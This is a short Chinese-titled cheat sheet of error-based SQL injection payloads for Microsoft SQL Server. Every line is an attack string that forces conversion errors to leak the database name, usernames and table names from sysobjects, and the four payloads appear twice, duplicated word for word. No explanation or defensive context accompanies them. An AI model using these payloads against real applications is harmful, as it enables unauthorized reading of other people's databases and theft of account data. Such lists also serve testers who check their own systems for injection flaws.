Mssql显错注入笔记
' and db_name()>1
' and 0=(SELECT top 1 username FROM table) and 'C'='C
' and 0=(SELECT top 1 username FROM table FOR XML PATH(''))--+-
' and 1=(select quotename(name) from 数据库..sysobjects where xtype=0x75 FOR XML PATH(''))--+-
' and db_name()>1
' and 0=(SELECT top 1 username FROM table) and 'C'='C
' and 0=(SELECT top 1 username FROM table FOR XML PATH(''))--+-
' and 1=(select quotename(name) from 数据库..sysobjects where xtype=0x75 FOR XML PATH(''))--+-
